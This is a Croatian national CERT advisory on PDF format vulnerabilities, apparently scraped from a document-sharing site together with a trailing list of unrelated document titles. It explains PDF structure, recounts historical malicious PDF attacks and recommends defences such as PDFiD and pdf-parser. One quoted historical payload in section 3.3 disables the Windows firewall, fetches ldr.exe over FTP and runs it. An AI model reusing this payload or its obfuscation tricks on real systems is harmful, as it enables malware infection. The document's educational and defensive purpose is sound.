Ranjivost PDF datoteka
|
|
- Влада Војводић
- пре 5 година
- Прикази:
Транскрипт
1
2 Sadržaj 1 UVOD O PDF FORMATU ELEMENTI I MOGUĆNOSTI PDF JEZIKA ALATI ZA RAD S PDF DATOTEKAMA STRUKTURA I JEZIK PDF-A RANJIVOSTI PDF-A DETALJNIJA ANALIZA STRUKTURE I JEZIKA PDF-A PDF KAO MALVER ZABILJEŽENI NAPADI ZAŠTITA OSNOVNE MJERE NAPREDNO OTKRIVANJE ZLOĆUDNIH DOKUMENATA ZAKLJUČAK LITERATURA...22 Ovaj dokument je vlasništvo Nacionalnog CERT a. Namijenjen je za javnu objavu, njime se može svatko koristiti, na njega se pozivati, ali samo u izvornom obliku, bez ikakvih izmjena, uz obavezno navođenje izvora podataka. Korištenje ovog dokumenta protivno gornjim navodima, povreda je autorskih prava CARNet a, sukladno Zakonu o autorskim pravima. Počinitelj takve aktivnosti podliježe kaznenoj odgovornosti koja je regulirana Kaznenim zakonom RH.
3 1 Uvod PDF, skraćeno od Portable Document Format, jedinstveni je format za razmjenu dokumenata kojeg je stvorila tvrtka Adobe godine. Dokument nastao na jednom računalu može se čitati na drugom, bez obzira na njihove operativne sustave i vrstu (stolno računalo, ručno računalo ili mobilni uređaj). Na prvi pogled, ovo se ne čini kao tako posebno svojstvo jer i druge aplikacije kao npr. Microsoft Word i Excel imaju svoje alternative na drugim platformama koje omogućuju čitanje njihovih dokumenata. Ono što čini PDF toliko posebnim je očuvanje sadržaja (integriteta) dokumenta koji je često važniji od same mogućnosti čitanja. Pretpostavimo da imamo dokument napisan u Microsoft Wordu na Windows operativnom sustavu u kojem se koriste generički fontovi za Windows aplikacije. Nakon što se taj dokument pretvori u PDF, može se pogledati i otisnuti sa očuvanim fontovima i grafikom na bilo kojoj platformi bez da ona posjeduje te fontove, grafiku i originalnu aplikaciju pomoću koje je nastao taj PDF dokument. Tako npr. ova činjenica tvrtkama eliminira potrebu za instalacijom jednakog paketa softvera u svim svojim odjelima, odnosno računalima. Ogromnu popularnost PDF format upravo zahvaljuje ovom svojstvu. Od godine PDF je postao otvoreni standard objavljen od svjetske organizacije za standardizaciju ISO (ISO/IEC :2008), dok je do tad Adobe posjedovao njegovu specifikaciju. Upravo ta popularnost i velik broj otkrivenih ranjivosti u softveru i propusta u samom jeziku kojeg PDF koristi za prikaz dokumenata, pogodovali su razvoju zloćudnog softvera koji koristi taj format.
4 2 O PDF formatu 2.1 Elementi i mogućnosti PDF jezika Specifikacija PDF jezika mnogo je složenija nego što se misli. Od nastanka, sa svakom novom verzijom, Adobe je dodavao nove mogućnosti. Posljednja inačica PDF-a je 1.7. Slika 2-1: logo PDF-a Svaka PDF datoteka sastoji se od niza objekata koji zajedno opisuju izgled jedne ili više stranica, obično uz dodatne interaktivne elemente i podatke sa višeg aplikacijskog sloja. Dokument može sadržavati bilo kakvu kombinaciju teksta, grafike i slika. Izgled stranice opisuje slijed sadržaja (content stream) koji uključuje niz grafičkih objekata. Podržani su i interaktivni elementi kao što su tekstualne zabilješke (text notes), poveznice (linkovi), zvukovi, video zapisi itd. Nadalje, PDF objekti mogu definirati okidače koji reagiraju i pokreću akcije kada korisnik pritisne određenu tipku na tipkovnici ili mišu itd. Tu su još i interaktivne forme, odnosno polja čije vrijednosti može korisnika prenijeti u drugu ili učitati iz druge aplikacije. Postoji osam vrsta objekata, a to su: boolean brojevi nizovi znakova (stringovi) imena nizovi objekata rječnici, odnosno kolekcija objekata indeksiranih imenima stream, obično sadrže veliku količinu podataka null objekt
5 Način na koji PDF format definira grafiku vrlo je sličan jeziku PostScript, a koristi Kartezijev koordinatni sustav, koji je neovisan o korištenoj platformi, za opis površine stranice. Opis stranice može koristiti matricu kako bi se grafičkom elementu mijenjala veličina, kako bi se okretao ili rotirao. Grafička stanja su kolekcija od 24 parametra (od PDF verzije 1.6) koja se mogu mijenjati, spremati i nanovo vraćati. Grafički model omogućuje da: figure budu u obliku znakova (glyph), linija, geometrijskom obliku ili da budu uzorak neke slike, odnosno digitalne fotografije figure mogu biti obojene, crne, bijele ili u bilo kojoj nijansi sive boje, a mogu biti i uzorak koji se ponavlja ili lagani prijelaz između različitih boja bilo koji od elemenata može biti zakačen (engl. clipped) na neki drugi oblik, tako da se prikazuje unutar njih Od verzije 1.3 u PDF je uvedena mogućnost dodavanja JavaScript koda. Tako se JavaScript kodom može utjecati na izgled stranica, podatke u poljima, na forme. Uz to, na izvršavanje koda može utjecati i neka akcija korisnika npr. samo otvaranje dokumenta. PDF posjeduje dvije mogućnosti za sigurnost svojih dokumenata. One se mogu koristiti posebno ili zajedno, odnosno obadvije istovremeno. To su: enkripcija dokument može biti kriptiran tako da ga samo autorizirani korisnici mogu otvoriti; postoji posebna autorizacija za autora dokumenta i za sve ostale; pristup korisnicima može biti i selektivno ograničen tako da oni mogu samo raditi samo određene operacije, npr. uređivanje, ispisivanje i dr. dokument može biti digitalno potpisan radi potvrde autentičnosti; potpis može biti u više oblika npr. sažetak dokumenta kriptiran privatnim ključem, biometrički potpis otiskom prsta itd.; bilo kakva promjena dokumenta čini potpis nevažećim
6 2.2 Alati za rad s PDF datotekama Tvrtka Adobe, kao izumitelj i bivši vlasnik specifikacija PDF-a je naravno najzastupljenija na tržištu alata. Njeni aktualni alati su (počevši od onog sa najmanje mogućnosti): Reader 9 besplatan, omogućuje pregledavanje, ispis i pretraživanje PDF dokumenata; u novoj verziji moguće je i ispunjavati formulare, ali podaci iz njih ne mogu se spremiti osim ako formulari nemaju dodijeljena specijalna prava za korisnike Readera; podaci iz formulara prosljeđuju se putem tipki preko elektroničke pošte ili slanjem na Web poslužitelj. Slika 2-2 prikazuje izgled sučelja Adobe Readera. Acrobat Standard 9 (samo za Windows operativne sustave) omogućuje stvaranje formi sa objektima, JavaScript kodom i skupljanje podataka sa njih; ne pruža dodatne (profesionalne) opcije za ispisivanje; ne uključuje alate za redakciju; ne može stvoriti indeksnu datoteku; podržava manje formata koji se mogu pretvoriti u PDF od Pro inačice Acrobat Pro podržava one opcije za koje je prethodno navedeno da ih Standard inačica ne podržava Acrobat Pro Extended podržava sve ono što i Pro inačice uz dodatak nekoliko drugih mogućnosti većinom vezanih uz rad sa multimedijom Ostali popularni alati: Foxit Reader i ostali alati iste tvrtke Evince Sumatra PDF Nitro PDF i dr.
7 Slika 2-2: sučelje Adobe Readera 2.3 Struktura i jezik PDF-a Struktura PDF-a sastoji se od zaglavlja koje sadrži verziju PDF-a koja se koristi (npr. %PDF- 1.1.), liste objekata, povratne reference (cross reference) i završnog dijela sa završnom oznakom (%%EOF). Pojednostavljena struktura PDF dokumenta izgleda ovako:
8 ZAGLAVLJE %PDF-[inačica] HIJERARHIJA OBJEKATA POVRATNA REFERENCA ZAVRŠNI DIO %%EOF Format oznake za objekt (obj taga) je: [objnum] [genid] obj (value) endobj Gdje su: [objnum] redni broj objekta obj, endobj ključne riječi [genid] identifikator verzije objekta koji sa objnum čini jedinstvenu oznaku objekta kojim se može referencirati (value) vrijednosti u objektu (vrsta fonta, akcije itd.)
9 Objekti su u hijerarhijskom odnosu roditelj-djeca. Povratna referenca služi za referenciranje objekata i sadrži njihove adrese u bajtovima u odnosu na početak dokumenta. Inače, PDF jezik je case-sensitive, odnosno razlikuje je li nešto napisano malim ili velikim slovom.
10 3 Ranjivosti PDF-a Pravila za leksičko izražavanje u PDF specifikaciji vrlo su labava i time otvaraju mogućnost napadačima da prikriju zloćudni kod. Naime, isti simbol moguće je napisati na više različitih načina i time izbjeći detekciju antivirusnim programima ili sustavima za detekciju upada. Svaki znak može se napisati heksadecimalnim ASCII kodom tako da npr. /Java#53cript je isto što i /JavaScript (53 je ASCII kod malog slova s). Zasad je velika većina pronađenih ranjivosti vezana uz: JavaScript dodatne mogućnosti (mailto, /Launch) vanjske programske biblioteke (Flash) formate i filtre za kodiranje, odnosno kompresiju (FlateDecode) U nekoliko slučajeva, napadači su koristili propuste PDF-a kod kompresije (zlib) i filtera za slike (FlateDecode i ASCII85Decode) kako bi prekrili zloćudan kod unutar PDF-a. Druga vrsta malvera koristi JavaScript u PDF-u kako bi se izvršile zloćudne procesorske naredbe. Nadalje, Didier Stevens upozorava [6] na /Launch /Action naredbu PDF-a koja omogućuje pokretanje bilo koje izvršne datoteke na računalu korisnika. Adobe Reader pri pokretanju takve naredbe upozorava korisnika i pita ga je li siguran da to želi, no tu je poruku Stevens uspio djelomično izmijeniti te je korisnika moguće socijalnim inženjeringom navesti da potvrdi akciju. Drugi popularni čitač PDF datoteka Foxit Reader čak niti ne upozorava korisnika. Nadogradnja softvera ne uklanja propust jer je zapravo riječ o ranjivost samog PDF jezika. Naime, spomenuta akcija Launch, kako je tako definirano u specifikaciji PDF-a, koristi ShellExecute funkciju operativnog sustava Windows. Zahvaćena su oba najpopularnija Microsoftova operativna sustava Windows XP sa SP3 i Windows 7. Stevens nije želio otkriti točno kojom metodom je ovo uspio. Također, Stevens je primijetio [3] kako se objekti u PDF dokumentu mogu definirati bilo kojim redoslijedom, tako da se logička struktura ne mijenja, za razliku od fizičke. Za primjer, sa samo 7 objekata moguće je izraditi 5020 različitih fizičkih struktura i to samo mijenjajući raspored objekata. Iz svega navedenog vidimo kako jezik PDF-a ima u svojim temeljima neke ranjivosti, tako da je moguće proizvesti zloćudni kod koji koristi ranjivost jezika, a ne softversku ranjivost, što može
11 biti vrlo opasno. Druga bitna stvar je iznimno velika zastupljenost PDF datoteka na Web stranicama i to tako da se one automatski pokreću unutar Web preglednika. Ovo može biti jako opasno, posebno ako korisnik nema dovoljno dobro podešenu sigurnost unutar Web preglednika i slijepo vjeruje bilo kakvom sadržaju. 3.1 Detaljnija analiza strukture i jezika PDF-a Kako bismo mogli ući u srž problematičnih mogućnosti koje format PDF-a pruža napadačima, potrebno je podrobnije upoznati jezik i način na koji su strukturirani PDF dokumenti. Navedimo primjer koda jednog cijelog dokumenta: %PDF obj << /Type /Catalog /Outlines 2 0 R /Pages 3 0 R >> endobj 2 0 obj << /Type /Outlines /Count 0 >> endobj 3 0 obj << /Type /Pages /Kids [4 0 R] /Count 1 >> endobj 4 0 obj << /Type /Page /Parent 3 0 R /MediaBox [ ] /Contents 5 0 R /Resources << /ProcSet [/PDF /Text] /Font << /F1 6 0 R >> >>
12 endobj 5 0 obj stream BT /F1 24 Tf Td (Hello World) Tj ET endstream endobj 6 0 obj << /Type /Font /Subtype /Type1 /Name /F1 /BaseFont /Helvetica /Encoding /MacRomanEncoding >> endobj xref f n n n n n n trailer << /Size 7 /Root 1 0 R >> startxref 644 %%EOF Pogledajmo prvi objekt: zapravo je riječ o indirektnom objektu jer ima broj pa se prema tome može referencirati. Objekt je tipa Catalog i riječ je o rječniku koji počinje i završava oznakama << i >>. U njemu su 2 0 R i 3 0 R reference na indirektne objekte 2 i 3. Objekt 2 opisuje crteže (nema ih) dok 3 opisuje stranice. Umjesto referenciranja objekata, u objekt 1 mogao se ubaciti cijeli objekt. U tom se slučaju, na mjestu gdje sada stoji referenca 2 0 R, ubaci objekt 2 uključujući znakove << i >> (to bi onda bio direktni objekt). Element kids u objektu 3 predstavlja listu stranica navedenu u uglatim zagradama. Ovdje imamo samo jednu stranicu koju predstavlja objekt 4 (oznaka 4 0 R).
13 Objekt 4 definira sadržaj (točnije gdje se on nalazi), resurse koji će koristiti za renderiranje i veličinu stranice. MediaBox predstavlja veličinu stranice, dok se sadržaj nalazi u objektu 5. Font je definiran u objektu 6. Objekt u kojem se nalazi sadržaj je specijalnog tipa stream object. Svrha ovog tipa objekta je da omogući korištenje raznih vrsta kodiranja (koji se zovu filteri u PDF jeziku) poput kompresije Zlib Flatedecode. Sadržaj takvog objekta je niz instrukcija za grafičko oblikovanje teksta koji započinje sa BT i završava za ET. U našem primjeru to su instrukcije: koristi font F1 veličine 24 idi na poziciju (100, 700) nacrtaj tekst Hello World Osim svega dosad, alatu za čitanje PDF dokumenta su potrebne još neke informacije. Treba znati koji objekt započinje opis dokumenta i indeks svakog objekta. Indeks objekta je povratna referenca (cross reference) oznake xref koja definira broj, verziju i apsolutnu poziciju objekta u datoteci. U našem primjeru nakon xref imamo 0 (broj prvog objekta) i 7 (veličinu xref tablice). Prvi indeks mora početi objektom broja 0 i verzije Broj 12 u drugoj liniji tablice znači da objekt 1 počinje nakon 12 bajtova datoteke, verzije je 0 (drugi stupac). Slovo n u trećem stupcu znači da se objekt koristi (ako imamo f, tada je objekt slobodan). Na kraju pod trailer se specifira koji je korijenski (root) objekt. 644 je apsolutna pozicija xref u PDF datoteci. 3.2 PDF kao malver Godišnji izvještaj o globalnim prijetnjama za (Annual Global Threat Report) kojeg izdaje tvrtka ScanSafe (dio telekomunikacijskog diva Cisco) pokazuje da je tijekom godine broj napada u kojima su korišteni zloćudni Adobe PDF dokumenti skočio sa 56% na 80% sveukupnih napada ciljanih na softver tvrtke Adobe. Taj se izvještaj inače temelji na najvećoj svjetskoj analizi realnog Internet prometa, točnije trilijunu zahtjeva za Web stranicama. Sigurnosna tvrkta F-Secure prošle je godine izvjestila [6] kako je tijekom broj napada vezanih uz datoteke Adobeovog Readera pretekao one vezane uz Microsoft Word. Na sljedećoj stranici imamo grafičke prikaze udjela napada prema različitim formatima u 2008., odnosno godini.
14 Slika 3-1: udio napada na PDF u usporedbi sa ostalim formatima u i (izvor: F-Secure)
15 Prema tvrtki McAffee [8], u prvoj četvrtini 2010., PDF datoteke čine 28% svog malvera vezanog uz zloupotrebu softvera, dok je taj broj tijekom i bio manji od 2%, a tijekom %: Slika 3-2: udjeli pronađenih zloupotreba (izvor: McAffe AvertLabs) Ovo potvrđuje da su napadači prepoznali PDF kao plodno tlo za svoje zlonamjerne radnje i dokazuje da je velik broj otkrivenih ranjivosti pogodovao većom iskorištavanju istih. S druge strane, ova činjenica je i rezultat toga da po istraživanju iz kolovoza 2009., čak 83.5% korisnika ne vrši redovite nadogradnje Adobeovih alata za rad sa PDF dokumentima. Napadači su svjesni činjenice da veći broj ranjivosti znači veću šansu za uspješnu infekciju. 3.3 Zabilježeni napadi Većina napada usmjerena je prema tome da se, kad korisnik otvori zloćudni PDF, pokrene novi proces, odnosno trojanski konj koji tako zarazi korisnikovo računalo. U srpnju godine zabilježeno je da napadači šire neželjene poruke elektroničke pošte (spam) s PDF dokumentima u privitku koji koriste tehnike zaštite PDF formata (enkripciju) kako bi otežali anti-virusnim alatima detekciju zloćudnog koda.
16 U rujnu godine otkrivena je ranjivost alata Adobe Reader i Acrobat (CVE ) koja je zahvaćala sve varijante alata verzija 8.1 i starijih te i starijih. Propust je omogućavao zloćudnom kodu da isključi Windows firewall, FTP-om preuzme crva i onda ga pokrene. Zloćudni PDF se širio om u privitku i bilo ga je dovoljno otvoriti da biste se zarazili. Zloćudni kod je sadržavao obj tag te je izgledao ovako: obj<</uri(mailto :%/../../../../../../Windows /system32/cmd".exe"" /c /q \"@echo off&netsh firewall set opmode mode=disable&echo o >1&echo binary>>1&echo get /ldr.exe>>1&echo quit>>1&ftp -s:1 -v -A>nul&del /q 1& start ldr.exe&\" \"&\" "nul.bat)/s/ URI> Tijekom mnogi zloćudni PDF dokumenti su koristili ranjivost JavaScript metode util.printf kako bi pokrenuli zloćudni kod iz memorije. Riječ je bilo o Adobe Readeru na Windows XP SP2. Krajem pojavila se naprednija vrsta zloćudnog PDF dokumenta istog tipa koji je koristio ranije zabilježenu ranjivost (CVE ) koristeći zloćudni JavaScript kod. Kao i mnoge ranije zloupotrebe tog tipa koristio je tehniku pretrpavanja memorije kako bi se kod izvršio točno na određenom dijelu memorije. To se izvodi gomilanjem NOP (No OPeration) naredbi procesoru. U ovom slučaju je riječ o nizu SBB (oduzimanje s posudbom) instrukcija koje imaju istu funkciju. Kod za pristup ljusci podijeljen je na dvije razine, što ovaj slučaj čini naprednijim od drugih. Naime, drugi dio koda je spremljen u drugom objektu, potpuno neovisno o prvom dijelu i on se izvršava (i postavlja u memoriju) iako dekompresija dokumenta ne uspijeva jer je PDF kod pogrešan. Tada, prvi dio koda pronalazi drugi dio u memoriji i prepušta mu daljnje izvođenje. Nakon toga, kod obrađuje ime PDF datoteke iz komandne linije i otvara je direktno, a sve zbog toga što ta PDF datoteka u sebi ima skrivene dvije izvršne datoteke (.exe). Prva pokušava dohvatiti zloćudni sadržaj sa mreže, dok druga otvara zloćudnu datoteku baby.pdf, kako korisnik ne bi primijetio da mu se prethodno srušio Adobe Reader. Na ovaj način napadač dobije potpunu kontrolu nad računalom korisnika. U travnju pojavio se zloćudni PDF dokument koji je u sebi sadržavao učahureni objekt kodiran korištenjem filtera Flatedecode i ASCII85Decode, a taj je objekt zapravo predstavljao XML datoteku koja u sebi nosi zloćudnu datoteku formata TIFF (Tagged Image File Format).
17 Malver je koristio dvije ranjivosti PDF-a: jednu vezanu uz JavaScript i drugu uz TIFF (CVE ). U lipnju zabilježeno je kako napadači koriste ranjivost authplay.dll datoteke koja dolazi uz svaku kopiju alata Adobe Reader i Acrobat te predstavlja prevoditelja za Adobe Flash sadržaj u PDF dokumentima. Napadači su u PDF dokumente postavljali zloćudni Flash sadržaj (stream). Propust je pogađao verzije 9 Adobeovih alata i to na operativnim sustavima Windows, Linux i Solaris. Ovaj propust su sigurnosne tvrtke kao Secunia ocijenile ekstremno kritičnim jer napadaču dozvoljava da preuzme kontrolu nad računalom napadnutog.
18 4 Zaštita 4.1 Osnovne mjere Mjere zaštite koje ćemo navesti ovdje ne osiguravaju apsolutnu zaštitu, ali uvelike pridonose sigurnosti. Kao i uvijek, vjerojatno najvažnija mjera zaštite je procjena može li se vjerovati sadržaju kojeg otvaramo, odnosno dolazi li on iz pouzdanog izvora, bio to ili neka web stranica. Najsigurnije je uvijek imati nadograđen PDF alat na zadnju dostupnu inačicu. Ali to često nije dovoljno, pogotovo u slučaju PDF-a. Potrebno je pratiti preporuke proizvođača jer je čest slučaj da proizvođač tek treba izdati zakrpu za neku ranjivost svojih alata (koja se već iskorištava), no zato postoji neko privremeno rješenje. Kod nekih slučajeva pomaže isključivanje podrške za JavaScript u PDF čitaču. U Adobe Readeru to se radi ovako: Edit -> Preferences -> JavaScript i maknuti kvačicu sa Enable Acrobat JavaScript Ostale mjere zaštite: korištenje najnovijeg anti-virusnog softvera, iako je praksa pokazala da oni prepoznaju samo manji dio malvera vezanog uz PDF isključivanje automatskog prikaza PDF dokumenata unutar Web preglednika; ako dokument prije otvaranja pohranimo na tvrdi disk, anti-virusni softver ima veću šansu otkriti zloćudan sadržaj korištenje alternativnog čitača umjesto Adobe Readera; napadači su se koncentrirali na ovaj alat zbog njegove popularnosti i mnogi napadi ne pogađaju alternativne alate (naravno to se ne odnosi na one koji koriste propuste u PDF specifikaciji) 4.2 Napredno otkrivanje zloćudnih dokumenata Stevens je u programskom jeziku Pyton razvio nekoliko alata za automatiziranu analizu PDF datoteka [4] koji pomažu kod utvrđivanja je li neka datoteka zloćudna. Analizu je potrebno
19 provoditi u sigurnim uvjetima, odnosno laboratoriju i to u Linux okruženju jer je velika većina napada ciljana na operativni sustav Windows. Prvi alat je PDFiD. Riječ je o specijaliziranom alatu za pretragu stringova koji traži određene ključne riječi i koristi metode kojima otkriva prikriveni kod (heksadecimalne znakove zna zamijeniti kako bi prepoznao kod). Nakon što neku sumnjivu PDF datoteku provučemo kroz ovaj alat, vidimo određene karakteristike dokumenta (verzija PDF-a, broj stranica) i ono najvažnije koliko puta se pojavljuje koja ključna riječ. Tabela 4-1: parametri alata PDFiD i njihova značenja s obzirom na sigurnost parametar / ključna riječ značenje obj, endobj broj ovih ključnih riječi govori nam koliko stream, endstream indirektnih objekata imamo u dokumentu xref, trailer, startref više od jednog pojavljivanja ovih ključnih riječi znači da postoji ulančano izvršavanje /Page broj stranica koliko dokument ima; Stevens [4] primjećuje da većina zloćudnih dokumenata ima jednu stranicu /Encrypt pokazuje da li je dokument kriptiran, to je jedna od metoda prikrivanja zloćudnog koda /ObjStm object stream je vrsta indirektnog objekta koji sadrži druge indirektne objekte; ako je unutar njega komprimiran JavaScript kod, ovaj alat ga neće otkriti /JavaScript, /JS nepostojanje ovih ključni riječi ne znači da u dokumentu nema JavaScript koda jer on može biti skriven u object streamu (/ObjStm) /RichMedia pokazuje da li postoji Flash sadržaj /AA, /OpenAction, /AcroForm da li postoje akcije kao što je npr. pokretanje JavaScript koda pri otvaranju dokumenta /JBIG2Decode postojanje JBIG2 formata slike u dokumentu, uz koji je vezana zabilježena ranjivost u Adobe alatima
20 Tablica 4-1 daje pregled izlaznih parametara alata PDFiD (od kojih su većina ključne riječi) i njihovih značenja u usporedbi sa vrijednostima, odnosno potencijalnu opasnost. PDFiD nudi i neke dodatne opcije kao što je računanje entropije dokumenta. Normalno je da imamo velike vrijednosti u stream objektima, a niske izvan njih. Ovaj alat ne kaže nam je li neki dokument zloćudan ili ne, samo nam pomaže u zaključivanju. Online verzija alata dostupna je na web stranici VirusTotal.com, portalu za skeniranje sumnjivih dokumenata. Drugi alat je pdf-parser, koji za razliku od PDFiDa posjeduje znanje o strukturi PDF dokumenata te može prepoznavati indirektne objekte, a također i dekomprimirati (koristiti filtre) kako bi npr. otkrio skriveni JavaScript kod u objektu tipa object stream. Analiza ovim alatom zahtijeva dosta vremena i poznavanje tehnika postavljanja zloćudnog koda u PDF, ranije spomenutih u ovom dokumentu. Oba alata dostupna su na blogu Didiera Stevensa [5].
21 5 Zaključak Kao što smo vidjeli, broj napada putem PDF dokumenata se u zadnje vrijeme drastično povećao. Otkriven je zaista velik broj ranjivosti alata za rad s tim formatom i ako tu uračunamo iznimno veliku popularnost, riječ je o ozbiljnoj prijetnji sigurnosti. Prosječni korisnik treba biti vrlo oprezan kod otvaranja dokumenata i držati se svih navedenih mjera zaštite. Jezik PDF-a sam po sebi sadrži neke propuste koje napadači mogu koristiti, tako da je jedno od rješenja definiranje nove specifikacije jezika. Trenutno je verzija 2.0 u razvoju. Adobe će, kao tvtka najviše pogođena napadima, u budućnosti sigurno više pažnje posvetiti sigurnosti i što bržem ispravljanju propusta. Očekuje se pojava novih, sve naprednijih napada, tako da je najvažnije pravovremeno informirrati korisnike.
22 6 Literatura 1. PDF Reference, Sixth Edition, Version 1.7, Adobe Systems Inc., studeni About the Physical and Logical Structure of PDF Files, Didier Stevens, travanj D. Stevens: Anatomy of Malicious PDF Documents Part One, magazin Hackin9, izdanje 3/ D. Stevens: Anatomy of Malicious PDF Documents Part Two, magazin Hackin9, izdanje 6/ PDF Tools 6. PDF Most Common File Type in Targeted Attacks, Didier Stevens, ožujak T. Padova: Adobe Acrobat 9 PDF Bible, 2009.
PDF = Potencijalno destruktivan fajl
PDF = Potencijalno Destruktivan Fajl Filip Vlašić, NCERT Sadržaj O PDF formatu Struktura PDF dokumenta Rizici Ranjivosti Exploit - primjeri Zaštita O PDF formatu Portable Document Format, nastao 1993.
ВишеRecuva CERT.hr-PUBDOC
Recuva CERT.hr-PUBDOC-2019-5-379 Sadržaj 1 UVOD... 3 2 INSTALACIJA ALATA RECUVA... 4 3 KORIŠTENJE ALATA RECUVA... 7 4 ZAKLJUČAK... 13 Ovaj dokument izradio je Laboratorij za sustave i signale Zavoda za
ВишеMicrosoft Word - CCERT-PUBDOC doc
Analiza Qchain programskog paketa CCERT-PUBDOC-2003-02-04 Sigurnosni problemi u računalnim programima i operativnim sustavima područje je na kojem CARNet CERT kontinuirano radi. Rezultat toga rada ovaj
ВишеPuTTY CERT.hr-PUBDOC
PuTTY CERT.hr-PUBDOC-2018-12-371 Sadržaj 1 UVOD... 3 2 INSTALACIJA ALATA PUTTY... 4 3 KORIŠTENJE ALATA PUTTY... 7 3.1 POVEZIVANJE S UDALJENIM RAČUNALOM... 7 3.2 POHRANA PROFILA KORISNIČKIH SJEDNICA...
ВишеMicrosoft Word - KORISNIČKA UPUTA za pripremu računala za rad s Fina potpisnim modulom_RSV_ doc
Uputa za pripremu računala za rad s Fininim potpisnim modulom Zagreb, lipanj 2019. Sadržaj: 1. UVOD... 3 2. POJMOVI I SKRAĆENICE... 3 3. TEHNIČKI PREDUVJETI KORIŠTENJA... 3 4. PODEŠAVANJE INTERNET PREGLEDNIKA
ВишеSVEUČILIŠTE U ZAGREBU FAKULTET ELEKTROTEHNIKE I RAČUNARSTVA Seminarski rad u okviru predmeta Računalna forenzika BETTER PORTABLE GRAPHICS FORMAT Matej
SVEUČILIŠTE U ZAGREBU FAKULTET ELEKTROTEHNIKE I RAČUNARSTVA Seminarski rad u okviru predmeta Računalna forenzika BETTER PORTABLE GRAPHICS FORMAT Matej Crnac Zagreb, siječanj 2018 Sadržaj Uvod 2 BPG format
ВишеREPUBLIKA HRVATSKA MINISTARSTVO PRAVOSUĐA Korisničke upute e-građani aplikacije za elektronsko izdavanje posebnog uvjerenja iz kaznene evidencije Zagr
REPUBLIKA HRVATSKA MINISTARSTVO PRAVOSUĐA e-građani aplikacije za elektronsko izdavanje posebnog uvjerenja iz kaznene evidencije Zagreb, 10. travnja 2017. Sadržaj 1 UVOD... 3 2 PRIJAVA U SUSTAV E-GRAĐANI...
Више8 2 upiti_izvjesca.indd
1 2. Baze podataka Upiti i izvješća baze podataka Na početku cjeline o bazama podataka napravili ste plošnu bazu podataka o natjecanjima učenika. Sada ćete izraditi relacijsku bazu u Accessu o učenicima
ВишеKORISNIČKE UPUTE APLIKACIJA ZA POTPIS DATOTEKA
KORISNIČKE UPUTE APLIKACIJA ZA POTPIS DATOTEKA SADRŽAJ 1. UVOD... 3 1.1. Cilj i svrha... 3 1.2. Područje primjene... 3 2. POJMOVI I SKRAĆENICE... 4 3. PREDUVJETI KORIŠTENJA... 5 4. PREGLED APLIKACIJE...
ВишеOpenDNS Family Shield CERT.hr-PUBDOC
OpenDNS Family Shield CERT.hr-PUBDOC-2019-6-381 Sadržaj 1 UVOD... 3 2 INSTALACIJA USLUGE OPENDNS FAMILY SHIELD... 5 2.1 KONFIGURACIJA NA OPERACIJSKOM SUSTAVU WINDOWS 10... 5 2.2 KONFIGURACIJA NA KUĆNOM/UREDSKOM
ВишеMicrosoft PowerPoint - podatkovni promet za objavu.pptx
1 2 3 Što je složaj protokola (protocol suite)? Pojedini protokol se odnosi samo na jedno pitanje koje omogućava komunikaciju. Kada se kombinira više protokola, grupa protokola koja je rezultat takve kombinacije
ВишеOpenVPN GUI CERT.hr-PUBDOC
OpenVPN GUI CERT.hr-PUBDOC-2019-7-384 Sadržaj 1 UVOD... 3 2 INSTALACIJA ALATA OPENVPN GUI... 5 3 KORIŠTENJE ALATA OPENVPN GUI... 17 4 ZAKLJUČAK... 27 Ovaj dokument izradio je Laboratorij za sustave i signale
Вишеkriteriji ocjenjivanja - informatika 8
8. razred Nastavne cjeline: 1. Osnove informatike 2. Pohranjivanje multimedijalnih sadržaja, obrada zvuka 3. Baze podataka - MS Access 4. Izrada prezentacije 5. Timska izrada web stranice 6. Kritički odnos
ВишеSlide 1
predmet Inženjerska informatika Operativni sistem dr Anica Milošević Koji operativni sistemi postoje? Microsoft Windows Linux Suse Red Hat Ubuntu Unix 26.1.2018. 2 Šta je Windows operativni sistem? Operativni
Више23. siječnja od 13:00 do 14:00 Školsko natjecanje / Osnove informatike Srednje škole RJEŠENJA ZADATAKA S OBJAŠNJENJIMA Sponzori Medijski pokrovi
3. siječnja 0. od 3:00 do 4:00 RJEŠENJA ZADATAKA S OBJAŠNJENJIMA Sponzori Medijski pokrovitelji Sadržaj Zadaci. 4.... Zadaci 5. 0.... 3 od 8 Zadaci. 4. U sljedećim pitanjima na pitanja odgovaraš upisivanjem
ВишеKorice copy
Sadržaj Softver... 2 Softveri za zaštitu... 2 Važnost podešavanja i ažuriranja operativnog sistema i aplikacija... 2 Korištenje korisničkog računa sa smanjenim privilegijama (limited user account)... 2
ВишеMicrosoft Word - 6. RAZRED INFORMATIKA.doc
Kriteriji ocjenjivanja i vrednovanja INFORMATIKA - 6. razred Nastavne cjeline: 1. Život na mreži 2. Pletemo mreže, prenosimo, štitimo, pohranjujemo i organiziramo podatke 3. Računalno razmišljanje i programiranje
ВишеMicrosoft Word - privitak prijedloga odluke
Informatički sustav za prikupljanje, simulaciju i prikaz podataka o cijenama javnih komunikacijskih usluga (dalje: Sustav e-tarife) Zagreb, HRVATSKA AGENCIJA ZA POŠTU I ELEKTRONIČKE KOMUNIKACIJE Roberta
ВишеNIAS Projekt e-građani KORISNIČKA UPUTA za aplikaciju NIAS Verzija 1.1 Zagreb, srpanj 2014.
Projekt e-građani KORISNIČKA UPUTA za aplikaciju Verzija 1.1 Zagreb, srpanj 2014. Naslov: Opis: Korisnička uputa za aplikaciju Dokument sadrži upute korisnicima aplikacije u sustavu e-građani Ključne riječi:
ВишеSmjernice za korištenje sustava online prijava Ukoliko imate pristupno korisničko ime i lozinku ili ste navedeno dobili nakon zahtjeva za otvaranje no
Smjernice za korištenje sustava online prijava Ukoliko imate pristupno korisničko ime i lozinku ili ste navedeno dobili nakon zahtjeva za otvaranje novog korisničkog računa (poslati zahtjev na javnipoziv.opp@havc.hr
ВишеMicrosoft Word - CCERT-PUBDOC doc
Analiza Password Safe programskog paketa CCERT-PUBDOC-2003-10-43 Sigurnosni problemi u računalnim programima i operativnim sustavima područje je na kojem CARNet CERT kontinuirano radi. Rezultat toga rada
ВишеČesto postavljana pitanja u programu OBRT 1. Kako napraviti uplatu u knjizi tražbina i obveza? 2. Kako odabrati mapu/disk za pohranu podataka? 3. Kako
Često postavljana pitanja u programu OBRT 1. Kako napraviti uplatu u knjizi tražbina i obveza? 2. Kako odabrati mapu/disk za pohranu podataka? 3. Kako instalirati (novi) finin certifikat? 4. Kako ispisati
ВишеSlide 1
